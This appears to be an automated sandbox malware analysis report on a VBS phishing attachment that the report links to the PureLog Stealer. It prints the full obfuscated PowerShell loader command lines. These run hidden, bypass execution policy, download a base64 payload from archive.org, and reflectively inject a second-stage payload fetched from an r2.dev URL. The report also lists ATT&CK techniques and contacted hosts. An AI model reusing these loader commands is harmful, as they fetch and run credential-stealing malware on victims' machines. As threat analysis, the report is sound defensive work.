              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzenkyd9dxinkydsiccrjz0gezb9ahr0chm6lycrjy9pytywmdewmccrjy51cycrjy5hcmnojysnaxynkydllm9yzycrjy8ynccrjy9pdgunkydtcy8nkydkjysnzxrhjysnac0nkydubycrj3qnkydllxyvrgunkyd0ywgnkydob3rlvi50eccrj3qnkyd7mccrj30nkyc7ezf9ymfzztynkyc0q29udgvudca9ichojysnzxcnkycttycrj2inkydqzscrj2n0ifn5c3rlbs5ozxqujysnv2viq2xpzscrj250ks4nkydeb3dubg8nkydhjysnzfn0cmlujysnzyh7jysnmx11cmwpoycrj3sxfwjpjysnbicrj2fyeunvbicrj3rlbnqgpsbbu3knkydzdgvtjysnlicrj0nvbnzlcnrdojpgcm9tjysnqmfzjysnzscrjzy0jysnu3ryaw5njysnkhsnkycxfwjhc2u2nenvbnqnkydlbnqpjysno3sxfscrj2fzc2vtymx5id0gjysnwycrj1jlzmwnkydljysny3rpb24uqxnzjysnzw1ibhldoicrjzpmb2fkkhsnkycxfwjpbicrj2fyeunvbnqnkydlbicrj3qnkycpo3sxfxr5cccrj2ugpscrjyankyd7mx1hjysncycrj3mnkydlbscrj2jsjysnes4nkydhzxrujysnexankydlkccrj3swjysnfscrj1j1blbflkhvbwunkyd7mccrj30pjysno3snkycxjysnfw1ldggnkydvzca9iccrj3snkycxfscrj3r5cguurycrj2v0tscrj2v0accrj28nkydkkhswfvynkydbsxswfsknkyc7eycrjzf9bwunkyd0jysnaccrj29klkludm9rzsh7jysnmx1udwxslcbbb2jqzwn0wycrj11dqccrjyh7mh0nkyd0ehquaycrj25zjysnyi92zscrj2qumniuy2rmzdc3jysnmmjmotk3mscrj2ezoscrjzmwodqnkyc1zdankyc2jysnodqnkyc4yzy0mzynkyctyicrj3vwly86c3b0jysndgh7mh0glcankyd7mh1kzxnhdgknkyd2ywrvezb9icwgjysnezb9zgvzjysnyxrpdmfkb3swfsasihswjysnfwrlc2enkyd0axzhzccrj297mh0sezb9qwrksw5qcm9jzxnzjysnmycrjzinkyd7mccrj30sezb9ezb9ksknksaglwygiftjsgfyxtm5lftjsgfyxtm2ksb8iglovk9lzs1lwhbsrvntsw9o';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/de'+'tah'+'notev.tx'+'t'+'{0'+'}'+';{1}base6'+'4content = (n'+'ew'+'-o'+'b'+'je'+'ct system.net.'+'webclie'+'nt).'+'downlo'+'a'+'dstrin'+'g({'+'1}url);'+'{1}bi'+'n'+'arycon'+'tent = [sy'+'stem'+'.'+'convert]::from'+'bas'+'e'+'64'+'string'+'({'+'1}base64cont'+'ent)'+';{1}'+'assembly = '+'['+'refl'+'e'+'ction.ass'+'embly]:'+':load({'+'1}bin'+'arycont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'gett'+'yp'+'e('+'{0'+'}'+'runpe.home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.g'+'etm'+'eth'+'o'+'d({0}v'+'ai{0})'+';{'+'1}me'+'t'+'h'+'od.invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}addinprocess'+'3'+'2'+'{0'+'},{0}{0}))') -f [char]39,[char]36) | invoke-expression"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzenkyd9dxinkydsiccrjz0gezb9ahr0chm6lycrjy9pytywmdewmccrjy51cycrjy5hcmnojysnaxynkydllm9yzycrjy8ynccrjy9pdgunkydtcy8nkydkjysnzxrhjysnac0nkydubycrj3qnkydllxyvrgunkyd0ywgnkydob3rlvi50eccrj3qnkyd7mccrj30nkyc7ezf9ymfzztynkyc0q29udgvudca9ichojysnzxcnkycttycrj2inkydqzscrj2n0ifn5c3rlbs5ozxqujysnv2viq2xpzscrj250ks4nkydeb3dubg8nkydhjysnzfn0cmlujysnzyh7jysnmx11cmwpoycrj3sxfwjpjysnbicrj2fyeunvbicrj3rlbnqgpsbbu3knkydzdgvtjysnlicrj0nvbnzlcnrdojpgcm9tjysnqmfzjysnzscrjzy0jysnu3ryaw5njysnkhsnkycxfwjhc2u2nenvbnqnkydlbnqpjysno3sxfscrj2fzc2vtymx5id0gjysnwycrj1jlzmwnkydljysny3rpb24uqxnzjysnzw1ibhldoicrjzpmb2fkkhsnkycxfwjpbicrj2fyeunvbnqnkydlbicrj3qnkycpo3sxfxr5cccrj2ugpscrjyankyd7mx1hjysncycrj3mnkydlbscrj2jsjysnes4nkydhzxrujysnexankydlkccrj3swjysnfscrj1j1blbflkhvbwunkyd7mccrj30pjysno3snkycxjysnfw1ldggnkydvzca9iccrj3snkycxfscrj3r5cguurycrj2v0tscrj2v0accrj28nkydkkhswfvynkydbsxswfsknkyc7eycrjzf9bwunkyd0jysnaccrj29klkludm9rzsh7jysnmx1udwxslcbbb2jqzwn0wycrj11dqccrjyh7mh0nkyd0ehquaycrj25zjysnyi92zscrj2qumniuy2rmzdc3jysnmmjmotk3mscrj2ezoscrjzmwodqnkyc1zdankyc2jysnodqnkyc4yzy0mzynkyctyicrj3vwly86c3b0jysndgh7mh0glcankyd7mh1kzxnhdgknkyd2ywrvezb9icwgjysnezb9zgvzjysnyxrpdmfkb3swfsasihswjysnfwrlc2enkyd0axzhzccrj297mh0sezb9qwrksw5qcm9jzxnzjysnmycrjzinkyd7mccrj30sezb9ezb9ksknksaglwygiftjsgfyxtm5lftjsgfyxtm2ksb8iglovk9lzs1lwhbsrvntsw9o';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/de'+'tah'+'notev.tx'+'t'+'{0'+'}'+';{1}base6'+'4content = (n'+'ew'+'-o'+'b'+'je'+'ct system.net.'+'webclie'+'nt).'+'downlo'+'a'+'dstrin'+'g({'+'1}url);'+'{1}bi'+'n'+'arycon'+'tent = [sy'+'stem'+'.'+'convert]::from'+'bas'+'e'+'64'+'string'+'({'+'1}base64cont'+'ent)'+';{1}'+'assembly = '+'['+'refl'+'e'+'ction.ass'+'embly]:'+':load({'+'1}bin'+'arycont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'gett'+'yp'+'e('+'{0'+'}'+'runpe.home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.g'+'etm'+'eth'+'o'+'d({0}v'+'ai{0})'+';{'+'1}me'+'t'+'h'+'od.invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}addinprocess'+'3'+'2'+'{0'+'},{0}{0}))') -f [char]39,[char]36) | invoke-expression"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 6.2.powershell.exe.217a44e1710.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.powershell.exe.217abd20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.powershell.exe.217a44e1710.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.powershell.exe.217abd20000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.1423540417.00000217ABD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1400827922.00000217A3CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 6.2.powershell.exe.217a44e1710.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.powershell.exe.217abd20000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.powershell.exe.217a44e1710.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.powershell.exe.217abd20000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.1423540417.00000217ABD20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1400827922.00000217A3CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts11
              Command and Scripting Interpreter              		221
              Scripting              		11
              Process Injection              		31
              Virtualization/Sandbox Evasion              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Process Injection              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture3
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              RFQ 2024.09.26-89 vivecta.vbs3%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://oneget.org0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              pub-6346c84860d5480393a1799fb277dfdc.r2.dev
              		172.66.0.235
              		truefalse
                		unknown
                ia600100.us.archive.org
                		207.241.227.240
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalse
                    		unknown
                    https://pub-6346c84860d5480393a1799fb277dfdc.r2.dev/bsnk.txtfalse
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.J.powershell.exe, 00000006.00000002.1422770948.00000217AB9A2000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 00000006.00000002.1381774221.0000021793C95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.0000021793CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1381774221.0000021794FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1400827922.00000217A3724000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000006.00000002.1381774221.0000021794D7E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://pub-6346c84860d5480393a1799fb277dfdc.r2.devpowershell.exe, 00000006.00000002.1381774221.0000021793C95000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1381774221.00000217938D3000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1381774221.00000217938D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://go.micropowershell.exe, 00000006.00000002.1381774221.0000021793F7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000006.00000002.1400827922.00000217A3724000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000006.00000002.1400827922.00000217A3724000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://aka.ms/pscore6powershell.exe, 00000002.00000002.1433370924.0000026580023000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://pub-6346c84860d5480393a1799fb277dfdc.r2.devpowershell.exe, 00000006.00000002.1381774221.0000021793C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1381774221.00000217938D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000006.00000002.1381774221.0000021793C95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.0000021793CBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.0000021793CAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.0000021793A8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://ia600100.us.arXJWpowershell.exe, 00000006.00000002.1381774221.0000021794D2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://contoso.com/powershell.exe, 00000006.00000002.1400827922.00000217A3724000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1381774221.0000021794FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1400827922.00000217A3724000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://oneget.orgXpowershell.exe, 00000006.00000002.1381774221.0000021794D7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://ia600100.us.archive.orgpowershell.exe, 00000006.00000002.1381774221.000002179497E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.00000217938D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.1433370924.0000026580069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.00000217936B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1433370924.000002658009C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1381774221.00000217936B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://oneget.orgpowershell.exe, 00000006.00000002.1381774221.0000021794D7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://ia600100.us.archive.orgpowershell.exe, 00000006.00000002.1381774221.0000021794D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.66.0.235
